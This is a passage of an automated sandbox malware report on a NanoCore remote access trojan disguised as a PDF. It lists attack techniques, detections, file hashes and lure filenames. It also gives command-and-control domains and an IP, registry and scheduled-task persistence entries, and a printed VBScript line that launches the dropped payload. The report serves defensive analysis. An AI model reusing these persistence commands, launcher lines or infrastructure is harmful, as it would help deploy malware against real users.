tionSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
blyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00392163
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00391B61
      Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
      Execution: 111 Scripting; 1 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
      Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
      Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
      Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 111 Scripting; 12 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 12 Masquerading; 2 Valid Accounts; 121 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection; 1 Hidden Files and Directories
      Credential Access: 31 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
      Discovery: 2 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 36 System Information Discovery; 341 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery; Permission Groups Discovery; Local Groups
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
      Collection: 11 Archive Collected Data; 31 Input Capture; 2 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
      Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 1 Data Encoding; 1 Remote Access Software; 1 Non-Application Layer Protocol; 21 Application Layer Protocol; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
      [Behavior graph omitted. Behavior Graph ID: 796783, Sample: 026910003102350.pdf.scr.exe, Startdate: 02/02/2023, Architecture: WINDOWS, Score: 100]

      Source | Detection | Scanner | Label
      026910003102350.pdf.scr.exe | 46% | ReversingLabs | Win32.Trojan.Lisk
      026910003102350.pdf.scr.exe | 46% | Virustotal |

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | 100% | Avira | DR/AutoIt.Gen
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | 46% | ReversingLabs | Win32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs |

      Source | Detection | Scanner | Label
      3.2.RegSvcs.exe.60b0000.7.unpack | 100% | Avira | TR/NanoCore.fadte
      19.2.RegSvcs.exe.d00000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

      Source | Detection | Scanner | Label
      december2nd.ddns.net | 12% | Virustotal |
      december2n.duckdns.org | 6% | Virustotal |

      Source | Detection | Scanner | Label
      december2nd.ddns.net | 12% | Virustotal |
      december2n.duckdns.org | 6% | Virustotal |
      december2n.duckdns.org | 100% | Avira URL Cloud | malware
      december2nd.ddns.net | 100% | Avira URL Cloud | malware
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      december2nd.ddns.net | 212.193.30.230 | true | true | | unknown
      december2n.duckdns.org | 212.193.30.230 | true | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      december2nd.ddns.net | true | 12%, Virustotal; Avira URL Cloud: malware | unknown
      december2n.duckdns.org | true | 6%, Virustotal; Avira URL Cloud: malware | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.autoitscript.com/autoit3/ | 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
          IP | Domain | Country | ASN | ASN Name | Malicious
          212.193.30.230 | december2nd.ddns.net | Russian Federation | 57844 | SPD-NETTR | true

          IP
          192.168.2.1
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:796783
          Start date and time:2023-02-02 08:08:12 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 13m 40s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:32
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:026910003102350.pdf.scr.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@43/44@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 99.7% (good quality ratio 92.3%)
          • Quality average: 78.7%
          • Quality standard deviation: 29.6%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 185
          • Number of non-executed functions: 223
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          Time | Type | Description
          08:10:03 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:14 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
          08:10:14 | API Interceptor | 602x Sleep call for process: RegSvcs.exe modified
          08:10:15 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
          08:10:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          08:10:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:41 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:11:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          Match | Associated Sample Name / URL | Detection | Context
          212.193.30.230 | PO.js | malicious | 212.193.30.230:6505/Vre
          212.193.30.230 | payment.js | malicious | 212.193.30.230:7780/is-ready
          212.193.30.230 | PO.js | malicious | 212.193.30.230:6505/Vre
          212.193.30.230 | PO.js | malicious | 212.193.30.230:7780/is-ready
          212.193.30.230 | NewPO.js | malicious | 212.193.30.230:7780/is-ready
          212.193.30.230 | dPFhxftFKAvajay.js | malicious | 212.193.30.230:7975/Vre

          Match | Associated Sample Name / URL | Detection | Context
          december2nd.ddns.net | Ox0YJcdK4s.exe | malicious | 212.193.30.230
          december2nd.ddns.net | IMG_000249230.pdf.scr.exe | malicious | 194.5.98.176
          december2n.duckdns.org | jjE6r0O7rF.exe | malicious | 212.193.30.230
          december2n.duckdns.org | Ox0YJcdK4s.exe | malicious | 212.193.30.230
          december2n.duckdns.org | obsERXPYBe.exe | malicious | 194.5.98.176
          december2n.duckdns.org | pu8PvGDGha.exe | malicious | 194.5.98.176
          december2n.duckdns.org | c6U3ESasLi.exe | malicious | 194.5.98.176

          Match | Associated Sample Name / URL | Detection | Context
          SPD-NETTR | 8el2WF5ixS.exe | malicious | 195.133.40.130
          SPD-NETTR | A3F0B643265E9895B3291658516CE2B34EB06D585BD8E.exe | malicious | 212.193.30.115
          SPD-NETTR | OukBj2y5jY.exe | malicious | 195.133.40.200
          SPD-NETTR | proof of payment & invoice copy.docx.doc | malicious | 212.193.30.4
          SPD-NETTR | http://195.133.40.73/bins/Paralysis.arm | malicious | 195.133.40.73
          SPD-NETTR | invoice89938.exe | malicious | 212.193.30.230
          SPD-NETTR | FJsd1qxDgJ.exe | malicious | 195.133.40.200
          SPD-NETTR | LhWQCnZEr8.exe | malicious | 195.133.40.200
          SPD-NETTR | Comprobant.xls | malicious | 195.133.40.200
          SPD-NETTR | jwlIVLR3d6.exe | malicious | 195.133.40.200
          SPD-NETTR | Odeme.xls | malicious | 195.133.40.200
          SPD-NETTR | Comprobante Enero.xls | malicious | 195.133.40.200
          SPD-NETTR | p3TPW34SPc.exe | malicious | 195.133.40.200
          SPD-NETTR | Promotion Instruction & Personal Referral Link for YouTube partners.docx.scr.exe | malicious | 195.133.40.102
          SPD-NETTR | LiRDJvWMnF.exe | malicious | 212.193.30.230
          SPD-NETTR | file.exe | malicious | 195.133.40.119
          SPD-NETTR | HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe | malicious | 212.193.30.115
          SPD-NETTR | D677F86403915B15AB62B1278CC7E6A8F2A98DE2BA6A8.exe | malicious | 212.193.30.115
          SPD-NETTR | invoice_78336.xlsm | malicious | 212.193.30.230
          SPD-NETTR | MPjSUCJrQw.exe | malicious | 212.193.30.230

          No context
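
          Match | Associated Sample Name / URL | Detection
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Fwb; Bank Remittance,[90,000,00,].exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 683348001 PO.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | DOCS..exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | AdobeUpdate.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | TT Copy -Redacted_Payment Confirmation 20232701.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | PURCHASE ORDER.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | PO-0987654567-987654567MNG.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | attached the document.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | attacched the document.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Pedido de Compra.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Order confirmation 223321.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | PURCHASE LIST.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | SHIPPING DOCS. 201002652122.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | new order.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | SOA.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Bank transfer 23.01.2023.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | SOA.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | invoice and packing list.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Product list.exe | malicious
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | INVOICE.exe | malicious
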
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45152
                                                  Entropy (8bit):6.149629800481177
                                                  Encrypted:false
                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: Fwb; Bank Remittance,[90,000,00,].exe, Detection: malicious, Browse
                                                  • Filename: 683348001 PO.exe, Detection: malicious, Browse
                                                  • Filename: DOCS..exe, Detection: malicious, Browse
                                                  • Filename: AdobeUpdate.exe, Detection: malicious, Browse
                                                  • Filename: TT Copy -Redacted_Payment Confirmation 20232701.exe, Detection: malicious, Browse
                                                  • Filename: PURCHASE ORDER.exe, Detection: malicious, Browse
                                                  • Filename: PO-0987654567-987654567MNG.exe, Detection: malicious, Browse
                                                  • Filename: attached the document.exe, Detection: malicious, Browse
                                                  • Filename: attacched the document.exe, Detection: malicious, Browse
                                                  • Filename: Pedido de Compra.exe, Detection: malicious, Browse
                                                  • Filename: Order confirmation 223321.exe, Detection: malicious, Browse
                                                  • Filename: PURCHASE LIST.exe, Detection: malicious, Browse
                                                  • Filename: SHIPPING DOCS. 201002652122.exe, Detection: malicious, Browse
                                                  • Filename: new order.exe, Detection: malicious, Browse
                                                  • Filename: SOA.exe, Detection: malicious, Browse
                                                  • Filename: Bank transfer 23.01.2023.exe, Detection: malicious, Browse
                                                  • Filename: SOA.exe, Detection: malicious, Browse
                                                  • Filename: invoice and packing list.exe, Detection: malicious, Browse
                                                  • Filename: Product list.exe, Detection: malicious, Browse
                                                  • Filename: INVOICE.exe, Detection: malicious, Browse
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):142
                                                  Entropy (8bit):5.090621108356562
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):142
                                                  Entropy (8bit):5.090621108356562
                                                  Encrypted:false
                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):143
                                                  Entropy (8bit):4.963345814111803
                                                  Encrypted:false
                                                  SSDEEP:3:FER/n0eFH5OUkh4E2J5xAIzbgFCdSfNUkh4E2J5xAIzbgbi1A:FER/lFHI923fzbgFeSfN923fzbgb7
                                                  MD5:C3DAE34C95AFBA3A4E22F956B6761EF7
                                                  SHA1:8DD9C50F51E1D8FA7492922AE3E05C8526824D88
                                                  SHA-256:60DFA2FD6C51979E9A3E669F487471408474A5ABB43FFFF5536160401FB0712F
                                                  SHA-512:987681FF2FC61676FE4FDFCBB748740BED5FC64AE9C7087D4D2EB0F492891ABDCBCD34CE2ADBBD50CCB390E098D867C0CE8B1CB4A10C7DD26AB6F1CFF58C821E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls"
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):597
                                                  Entropy (8bit):6.186253247413455
                                                  Encrypted:false
                                                  SSDEEP:12:oXEXUz6MlWRGKb57dGZ47amIGP115oCnWRi8UVEpmyvLSoK/:OEXU+71dGG7apGRoYWRizVimyJg
                                                  MD5:9D23B8A8A8DC43EC163438D3E58CDB4E
                                                  SHA1:083823FFA163D66242EC8E04AD9C9A02A3F5F32E
                                                  SHA-256:D249EC95400898681404C2D824E77651C8D8ACFFEBE92F51BC6D337DF11DB895
                                                  SHA-512:ABA25C811AC517981F7F68F803B205E326B89F390E4E4208FE0CA51312EA15F403468C88EBC3C64EDCF8447E377012FCBA100D0BCB04A3BC861FCE041B7EE6D6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):503
                                                  Entropy (8bit):6.217480782110286
                                                  Encrypted:false
                                                  SSDEEP:12:BRE/nyLFn4WfUw7LT6aZXxGOAl54d3JcfZCMJL+VUftgAeryz/:n0YdRlFZwvlUJcfZL+VVqr
                                                  MD5:2732EEA4B454A9C18455717D791AA346
                                                  SHA1:6E3F73A1A0ADEA9FDBAE17F9E0208D6AD08B05EC
                                                  SHA-256:64E99289977F284CE1C930F9E27A813C60C4F379E3E38F845E4EF11703ADE375
                                                  SHA-512:69ADE759606DAF638525F6DACBAD04CD8CCCF724F2D1768CA5B3F16545F937D62B28DA738510BA78FBA83A7190DFAF80A1E19914A027DAFDBFDDEAD655F67FCC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):528
                                                  Entropy (8bit):6.181783102675102
                                                  Encrypted:false
                                                  SSDEEP:12:AjJFkEaE4BuYCDwUEY7Yn6eb0yVIHmMY7EC0LuHvZ2ItWDNEpKnFg0T:AjJDZ4BSDwURYn6eb0yVIlIvMqEFv
                                                  MD5:B999711E1C647771E59A27D40F75E908
                                                  SHA1:E1DBE34813EF6241B4B227042649805372321794
                                                  SHA-256:6A9A2E454761426D0B07209E1958C520D008D8EFAABB12CFAFE777C15B0FA562
                                                  SHA-512:7A5783199BB73E284E56A3D4D26268DABC6D1973562D91D4253D3EDA9EBD483F89F9D2545146CDE4935FAFF70F981B5B617CDA7B3A25E769C0C9E44BFCE6B876
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):407473
                                                  Entropy (8bit):4.048588207938584
                                                  Encrypted:false
                                                  SSDEEP:3072:/JGA8gDqUGMl95jTDOWmA72KRvgr00mvlIRHqsEZipg7O65J48al5plklct4wyNu:h5VGMBJRvgr09nZiq7OIy8az0a4DuP
                                                  MD5:48F9952AAAFE4CA15D39581E78889AC0
                                                  SHA1:569F6FB010FEFB412192A968784DB355B8311853
                                                  SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
                                                  SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):62820
                                                  Entropy (8bit):6.7478449446190245
                                                  Encrypted:false
                                                  SSDEEP:768:EaauGtmxdbAYaauGtmxdbAXaauGtmxdbAbaauGtmxdbAXaauGtmxdbA9aauGtmxt:NqJ5qJOqJ6qJOqJYqJ7qJrqJ/qJ5
                                                  MD5:F96269E1056B12E82772B66B0884F8A6
                                                  SHA1:C4D4F2D680A1A95B3FE3462A0F2CF80DC5DD8B05
                                                  SHA-256:2A8C2D73D15B644CFCB109F61099B5501C706CD539D885C3929E35F636A886B8
                                                  SHA-512:4A38D9B82454101EC0BAFE7EA472BCDC457724377F6B4277B7BBBEAE362B402C9012B17F0613B46817F5BF80355E005A01A57A6FE85E6EDF7AB90BF654572596
                                                  Malicious:false
                                                  Reputation:unknown
